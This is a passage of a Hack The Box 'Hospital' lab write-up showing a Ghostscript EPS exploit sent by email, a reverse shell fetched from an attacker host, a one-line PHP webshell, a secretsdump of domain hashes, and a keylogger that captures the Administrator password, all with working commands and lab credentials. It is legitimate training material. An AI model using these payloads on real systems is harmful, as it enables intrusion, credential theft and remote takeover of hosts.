GROUP-ME... 10.10.11.241    389    DC               Enterprise Admins
GROUP-ME... 10.10.11.241    389    DC               Domain Admins

root@244ea95da6a7:~# nxc ldap 10.10.11.241 -d hospital.htb -u 'drwilliams' -p 'qwe123!@#' -M group-mem -o group='Protected Users'
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.241    636    DC               [+] hospital.htb\drwilliams:qwe123!@# 

root@244ea95da6a7:~# nxc ldap 10.10.11.241 -d hospital.htb -u 'drwilliams' -p 'qwe123!@#' -M group-mem -o group='Domain Computers'
SMB         10.10.11.241    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.241    636    DC               [+] hospital.htb\drwilliams:qwe123!@# 
```

The user `drbrown` is present in `Remote Management Users` as well as `Remote Desktop Users` group.  

I collected Bloodhound data to look for possible paths, but it led nowhere.

## Ghostscript RCE through EPS attachment

The credentials `drwilliams:qwe123!@#` also work on the RoundCube webmail instance.  
We have a mail from `drbrown@hospital.htb`:

```text
Dear Lucy,

I wanted to remind you that the project for lighter, cheaper and
environmentally friendly needles is still ongoing 💉. You are the one in
charge of providing me with the designs for these so that I can take
them to the 3D printing department and start producing them right away.
Please make the design in an ".eps" file format so that it can be well
visualized with GhostScript.

Best regards,
Chris Brown.
😃
```

Ghostscript has a bunch of CVEs:

- CVE-2021-3781
The PoC is available at <https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50>

- CVE-2023-28879
The PoC is available at <https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce> but involves binary exploitation and is for linux.

- CVE-2023-36664
The PoC is available at <https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection>

I expected the last one to be the most viable.

```console
opcode@debian$ git clone https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection.git
opcode@debian$ cd CVE-2023-36664-Ghostscript-command-injection
opcode@debian$ python3 CVE_2023_36664_exploit.py -x eps -f needle -p "powershell.exe IEX(IWR http://10.10.14.165:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.165 9001" -g 
[+] Generated EPS payload file: needle.eps
```

I attached `needle.eps`, enabled "Return receipt" and "Delivery status notification" and replied to the mail.  
After a while, I received the shell as `drbrown`. I found the script responsible for automation of Ghostscript:

```console
PS C:\Users\drbrown.HOSPITAL\Documents> cat .\ghostscript.bat 
@echo off
set filename=%~1
powershell -command "$p = convertto-securestring 'chr!$br0wn' -asplain -force;$c = new-object system.management.automation.pscredential('hospital\drbrown', $p);Invoke-Command -ComputerName dc -Credential $c -ScriptBlock { cmd.exe /c "C:\Program` Files\gs\gs10.01.1\bin\gswin64c.exe" -dNOSAFER "C:\Users\drbrown.HOSPITAL\Downloads\%filename%" }"
```

It contains another set of credentials:

```console
drbrown:chr!$br0wn
```

We can get a WinRM shell as `drbrown`:

```console
root@244ea95da6a7:~# nxc winrm 10.10.11.241 -d hospital.htb -u 'drbrown' -p 'chr!$br0wn' -X 'IEX(IWR http://10.10.14.165:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.165 9001'
```

## Post-shell AD enumeration

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name        SID
================ ============================================== 
hospital\drbrown S-1-5-21-4208260710-2273545631-1523135639-1601 


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users                Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users               Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

Nothing useful here other than the `Remote Desktop Users` group.

```console
PS C:\> netstat -ano -p TCP | findstr LISTENING
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING       2960 
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       664  
  TCP    0.0.0.0:110            0.0.0.0:0              LISTENING       2960 
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       932  
  TCP    0.0.0.0:143            0.0.0.0:0              LISTENING       2960 
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       664  
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       2788 
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4    
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       664  
  TCP    0.0.0.0:587            0.0.0.0:0              LISTENING       2960 
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       932  
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:1801           0.0.0.0:0              LISTENING       2200
  TCP    0.0.0.0:2103           0.0.0.0:0              LISTENING       2200
  TCP    0.0.0.0:2105           0.0.0.0:0              LISTENING       2200
  TCP    0.0.0.0:2107           0.0.0.0:0              LISTENING       2200
  TCP    0.0.0.0:2179           0.0.0.0:0              LISTENING       3400
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       2524
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       528
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:6400           0.0.0.0:0              LISTENING       516
  TCP    0.0.0.0:6401           0.0.0.0:0              LISTENING       1208
  TCP    0.0.0.0:6402           0.0.0.0:0              LISTENING       1528
  TCP    0.0.0.0:6403           0.0.0.0:0              LISTENING       1888
  TCP    0.0.0.0:6404           0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:6406           0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:6407           0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:6409           0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:6616           0.0.0.0:0              LISTENING       2200
  TCP    0.0.0.0:6619           0.0.0.0:0              LISTENING       648
  TCP    0.0.0.0:6632           0.0.0.0:0              LISTENING       2912
  TCP    0.0.0.0:6638           0.0.0.0:0              LISTENING       2848
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2728
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    10.10.11.241:53        0.0.0.0:0              LISTENING       2912
  TCP    10.10.11.241:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2912
  TCP    127.0.0.1:6015         0.0.0.0:0              LISTENING       2856
  TCP    192.168.5.1:53         0.0.0.0:0              LISTENING       2912
  TCP    192.168.5.1:139        0.0.0.0:0              LISTENING       4
```

Some ports were not exposed, but I don't see any interesting service.  
We can try running [adPEAS](https://github.com/61106960/adPEAS):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.165:8000/adPEAS.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-adPEAS
```

Nothing in the result caught my eye.  
I looked through `Bloodhound` after marking `drbrown` as owned, but found nothing.  
We can also run [PrivescCheck](https://github.com/itm4n/PrivescCheck):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.165:8000/PrivescCheck.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-PrivescCheck -Extended
```

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Service binary permissions                        ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether the current user has any write permissions on  ┃
┃ a service's binary or its folder.                            ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Vulnerable - High 


Name              : Apache2.4
ImagePath         : "C:\xampp\apache\bin\httpd.exe" -k runservice
User              : LocalSystem
ModifiablePath    : C:\xampp\apache\bin
IdentityReference : BUILTIN\Users
Permissions       : AddSubdirectory
Status            : Unknown
UserCanStart      : False
UserCanStop       : False

[--SNIP--]
```

Write permission over webroot is always good to have.

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0043 - Reconnaissance                           ┃
┃ NAME     ┃ Non-default applications                          ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about non-default and third-party            ┃
┃ applications by searching the registry and the default       ┃
┃ install locations.                                           ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational 

Name                                 FullName
----                                 --------
Google                               C:\Program Files (x86)\Google
hMailServer                          C:\Program Files (x86)\hMailServer
Microsoft SDKs                       C:\Program Files (x86)\Microsoft SDKs
Microsoft SQL Server Compact Edition C:\Program Files (x86)\Microsoft SQL Server Compact Edition
Microsoft Synchronization Services   C:\Program Files (x86)\Microsoft Synchronization Services
Windows Kits                         C:\Program Files (x86)\Windows Kits
Google                               C:\Program Files\Google
gs                                   C:\Program Files\gs
Hyper-V                              C:\Program Files\Hyper-V
Microsoft                            C:\Program Files\Microsoft
Microsoft UCMA 4.0                   C:\Program Files\Microsoft UCMA 4.0
Runtime                              C:\Program Files\Microsoft UCMA 4.0\Runtime
PuTTY                                C:\Program Files\PuTTY
Python312                            C:\Program Files\Python312
VMware                               C:\Program Files\VMware
VMware Tools                         C:\Program Files\VMware\VMware Tools
Windows Identity Foundation          C:\Program Files\Windows Identity Foundation
xampp                                C:\xampp
```

I haven't seen several of them on HTB machines before.

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ User sessions                                     ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about the currently logged-on users. Note    ┃
┃ that it might be possible to capture or relay the            ┃
┃ NTLM/Kerberos authentication of these users (RemotePotato0,  ┃
┃ KrbRelay).                                                   ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational 

SessionName UserName         Id        State
----------- --------         --        -----
Services                      0 Disconnected
Console     HOSPITAL\drbrown  1       Active
```

`drbrown` has another session.  
As evident from these results, there are multiple paths to pursue, and they all lead to privilege escalation.

## Unintended 1 - RDP to read password

The most straightforward approach is to RDP to the box:

```console
opcode@debian$ xfreerdp /v:10.10.11.241 /u:drbrown /p:'chr!$br0wn'
```

In the RDP session, we'd find an automated script typing Administrator's password into Roundcube:

![1](images/1.png)

We can wait for it to finish, press <kbd>F12</kbd>, visit console and use the following code to change the type of input from `password` to `text`:

```js
document.getElementById("rcmloginpwd").type="text";
```

We'd be able to grab the credentials:

```text
Administrator:Th3B3stH0sp1t4l9786!
```

The credentials can be used to perform DCsync or to obtain a shell with `psexec.py`

```console
opcode@debian$ secretsdump.py hospital.htb/Administrator:'Th3B3stH0sp1t4l9786!'@DC.hospital.htb -just-dc
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
hospital.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1a0158142556cfc5aa9fdb974e0352f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:26fb7ca2f4a67b2d8d81ffcfeeeffd13:::
hospital.htb\$431000-R1KSAI1DGHMH:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hospital.htb\SM_0559ce7ac4be4fc6a:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hospital.htb\SM_bb030ff39b6c4a2db:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hospital.htb\SM_9326b57ae8ea44309:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hospital.htb\SM_b1b9e7f83082488ea:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hospital.htb\SM_e5b6f3aed4da4ac98:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hospital.htb\SM_75554ef7137f41d68:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hospital.htb\SM_6e9de17029164abdb:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hospital.htb\SM_5faa2be1160c4ead8:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hospital.htb\SM_2fe3f3cbbafa4566a:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hospital.htb\drbrown:1601:aad3b435b51404eeaad3b435b51404ee:33a3edc8fc4cf06cb3b836c541a7b997:::
hospital.htb\drwilliams:1602:aad3b435b51404eeaad3b435b51404ee:c377ba8a4dd52401bc404dbe49771bbc:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:e5ab307522689fdeb58c50aec017c1a4:::
[*] Kerberos keys grabbed
hospital.htb\Administrator:aes256-cts-hmac-sha1-96:5537a1b07e5c7ce1ba20183c79b6c1e1d8be7ce9a12baf719853701cc5a3cbe0
hospital.htb\Administrator:aes128-cts-hmac-sha1-96:17414f5d55e0ea1455a8c7ea11e34e80
hospital.htb\Administrator:des-cbc-md5:c245e3402f7c9e64
krbtgt:aes256-cts-hmac-sha1-96:0fa78db0cef2cc7a56c8b9657743c55f87037982e25beab9dcdd7a6d09789fad
krbtgt:aes128-cts-hmac-sha1-96:57da539f1b895bdf0026b5a08429c484
krbtgt:des-cbc-md5:c7cb804a8a3b83ef
hospital.htb\drbrown:aes256-cts-hmac-sha1-96:7cbbd6914d728f86c4a950f17b80508cfb61027c2879c4e533ba8b5b6d55928a
hospital.htb\drbrown:aes128-cts-hmac-sha1-96:b40d0ee5b36179ab1b6983b7f12ff6e3
hospital.htb\drbrown:des-cbc-md5:3df7970d5e15b5df
hospital.htb\drwilliams:aes256-cts-hmac-sha1-96:0f6c21680d0963c6ce6295cec6db401b01b0ac585a45d6b7088faef35bf2f912
hospital.htb\drwilliams:aes128-cts-hmac-sha1-96:3d860b5d1003cbc88dfeee209be5abe8
hospital.htb\drwilliams:des-cbc-md5:491c4f1f525731ab
DC$:aes256-cts-hmac-sha1-96:da66c3dd9118a74e57aacb179ec9eee764e3dd0c970206cd664d8f3d56879eee
DC$:aes128-cts-hmac-sha1-96:99a60adcb7a8394b494ee00a3339549a
DC$:des-cbc-md5:7a311637768a40ad
[*] Cleaning up... 
```

```console
opcode@debian$ psexec.py hospital.htb/Administrator:'Th3B3stH0sp1t4l9786!'@DC.hospital.htb               
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Requesting shares on DC.hospital.htb.....
[*] Found writable share ADMIN$
[*] Uploading file qaOsduAT.exe
[*] Opening SVCManager on DC.hospital.htb.....
[*] Creating service ZMpG on DC.hospital.htb.....
[*] Starting service ZMpG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4974]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

It is not the intended approach. The user `drbrown` was not supposed to be a member of the `Remote Desktop Users` group.

## Unintended 2 - Webshell in Apache webroot

Since we have write permissions over XAMPP webroot, we can write a webshell. I used:

```php
<?php system($_SERVER['HTTP_USER_AGENT'])?>
```

```console
PS C:\xampp\htdocs> iwr 10.10.14.165:8000/webshell_ua.php -o webshell.php
```

We get straight system through this webshell:

```console
opcode@debian$ curl -k 'https://hospital.htb/webshell.php' -A 'whoami'
nt authority\system
```

It is not the intended approach either. Users were not supposed to have write permissions over XAMPP directories.

## Intended - Keylogger to retrieve credentials

```console
PS C:\> qwinsta
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
>services                                    0  Disc
 console           drbrown                   1  Active
 rdp-tcp                                 65536  Listen

PS C:\> query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 drbrown               console             1  Active      none   11/19/2023 12:54 PM
```

Besides our WinRM session (which runs with ID 0), a session with ID 1 also exists for `drbrown`  
We can use [xct](https://twitter.com/xct_de)'s [adopt](https://github.com/xct/adopt) to start a session 1 process.  
I cloned the repo, opened the solution, updated `PlatformToolset` to `v143`, set the configuration to `x64 Release`, and used <kbd>Ctrl</kbd> + <kbd>B</kbd> to build.

We also need a tool to take screenshots. We can use `xct`'s [scr](https://github.com/xct/scr)  
I built it in the same manner.

We also need an executable for reverse shell. I initially compiled my own reverse shell binary, but `adopt` did not like it.  
Therefore, I had to rely on `xct`'s [rcat](https://github.com/xct/rcat):

```console
opcode@debian$ git clone https://github.com/xct/rcat.git
opcode@debian$ cd rcat
opcode@debian$ sudo apt install mingw-w64
opcode@debian$ rustup target add x86_64-pc-windows-gnu
opcode@debian$ rustup toolchain install stable-x86_64-pc-windows-gnu
opcode@debian$ cargo build --release --target x86_64-pc-windows-gnu
```

Once built, we can transfer all the files to the box

```console
PS C:\Windows\Tasks> iwr 10.10.14.165:8000/adopt.exe -o adopt.exe
PS C:\Windows\Tasks> iwr 10.10.14.165:8000/scr.exe -o scr.exe
PS C:\Windows\Tasks> iwr 10.10.14.165:8000/rcat.exe -o rcat_10.10.14.165_9001.exe
```

We can try to spawn a session 1 process now:

```console
PS C:\Windows\Tasks> .\adopt.exe explorer.exe C:\\Windows\\Tasks\\rcat_10.10.14.165_9001.exe
[>] Target pid is 1492
[>] ShellExecuteExW is at 00007FFEAE055B70
[>] Thread running, done! (Handle: 164)
```

We can check in powershell that it is indeed running in session 1:

```console
PS C:\Windows\Tasks> ps | findstr rcat
     80       6      868       3372       0.00   7524   1 rcat_10.10.14.165_9001
```

In the session 1, we can run `scr` to get a screenshot:

```console
PS C:\Windows\Tasks> .\scr.exe
```

Now, we need to start an SMB server to transfer the file:

```console
opcode@debian$ sudo smbserver.py -username opcode -password opcode -smb2support crate `pwd`
```

And add it to the box with:

```console
PS C:\Windows\Tasks> net use \\10.10.14.165\crate opcode /user:opcode
The command completed successfully.
```

Now, we can transfer the file:

```console
PS C:\Windows\Tasks> copy .\scr.jpg \\10.10.14.165\crate\scr1.jpg
```

If we take multiple screenshots after some intervals, we'd learn that an automated script is filling in credentials on the Roundcube login page.

Therefore, the intended approach is to use a keylogger to get the password.  
I decided to use [SharpLogger](https://github.com/djhohnstein/SharpLogger)  
I cloned the repo, opened the solution, updated `target` to `.NET Framework 4.8`, set the configuration to `Release`, and used <kbd>Ctrl</kbd> + <kbd>B</kbd> to build.

```console
PS C:\Windows\Tasks> iwr 10.10.14.165:8000/Keylogger.exe -o Keylogger.exe
```

If we start the program and wait for a while, we'd get the credentials:

```console
PS C:\Windows\Tasks> .\Keylogger.exe

User    : HOSPITAL\drbrown
Window  : Hospital Webmail :: Welcome to Hospital Webmail - Internet Explorer
Time    : 2024-04-19 07:47:59 PM
LogFile : C:\Users\drbrown.HOSPITAL\AppData\Local\Temp\1\aaaca27b-7533-409c-ac89-0586d24d5672.log
----------------------------------------------

AdministratorTh3B3stH0sp1t4l9786!
```
